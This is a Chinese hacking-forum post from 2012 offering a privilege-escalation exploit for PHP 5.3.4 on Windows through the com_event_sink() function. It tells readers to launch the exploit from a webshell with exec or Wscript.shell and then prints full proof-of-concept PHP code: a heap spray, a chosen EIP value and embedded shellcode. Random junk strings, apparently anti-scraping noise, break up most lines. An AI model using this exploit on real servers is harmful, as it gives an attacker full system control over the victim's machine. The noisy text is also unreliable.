找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2235|回复: 0
打印 上一主题 下一主题

PHP 5.3.4(WIN) COM_SINK权限提升漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 21:08:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
8 ^" D) s9 W. s5 p1 @- d* R
  O( @& y, C, W# o. _测试方法如下:cmd /c x:\php\php.exe x:\test.php' }0 S4 ]1 M1 h7 w
- X5 N' ^: ?+ C7 p) V; r  F1 A( m" h
下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php7 V( t4 @. I" P6 x4 Z7 M, {
这里是两个测试的截图:+ s' z9 c$ j- _; q8 h
0 L2 H# K7 E& U4 W: k

& h* L1 R: h7 m2 O. f" F
$ o9 |% [1 e0 @7 N7 e! r* G
- \2 o% K! b7 j! h% w/ z
9 [/ G2 e8 }) m5 B* u成功利用此漏洞的攻击者将获得系统的最高权限
' |/ U5 c+ }+ H' E6 I% Z$ z+ m; B/ b4 T2 i

0 I! A) l9 N3 a# b1 T( [. C
3 ]& P+ T+ ]) @+ j4 ^6 f& L; w1 J" J# {

. g, c% x6 o4 R% X关于漏洞分析稍后附上。一下是PoC代码:: B% S# t: o: x- ]1 H. P
* n" j& w; g7 t$ o
<?php
: J' y/ o* i# D7 \2 B* [//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
2 F7 e* k! |  X& a: L//$eip ="\x44\x43\x42\x41";% u$ w% j8 j" r& T# \
$eip= "\x4b\xe8\x57\x78";
, f$ i  H, H) V9 q4 a$eax ="\x80\x01\x8d\x04";' E8 Z. c1 C7 \
$deodrant="";
5 O& G) @) s8 ^6 p& S5 K% y) p$axespray = str_repeat($eip.$eax,0x80);! q+ @% l3 ?) g
//048d01901 Z- ?( P/ f- Q& y) Y9 |& S1 p8 K
echo strlen($axespray);4 D; Z) v- v/ f5 g3 u: w! g
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
; I& [6 K! u: t  t( a. o- _; v# Zecho "Silic Group Hacker Army - BlackBap.Org";$ o4 U. C) f( g& T( H
//19200 ==4B32 4b00
% j* a: J6 J/ ofor($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
2 I7 m' n' h( [+ {( l$ ^+ [. x$terminate = "T";) @: ]" x% K& T3 e  T8 k
$u[] =$deodrant;! T: g0 v8 ?: a1 [2 N. S
$r[] =$deodrant.$terminate;
, ^; x+ h. h4 E$a[] =$deodrant.$terminate;
0 c$ Y: _& o+ V$ r9 {9 i7 D$s[] =$deodrant.$terminate;
- r+ `$ ~) o+ X8 A+ a- i( S+ L1 E//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的
3 X5 K3 c- m" J$ F/ V$vVar = new VARIANT(0x048d0000+180);* U6 @+ `* ~  W. @9 l& d
//弹窗代码(Shellcode)
" Z9 H' P. z9 E, O8 d, ]6 i$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";' [0 c) h  z" k4 n7 K
$var2 = new VARIANT(0x41414242);% v+ T, J( T  j2 A" d* L" g' q4 E
com_event_sink($vVar,$var2,$buffer);+ I6 j1 K4 m" _
?>
. F  v! q; w( p, I

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表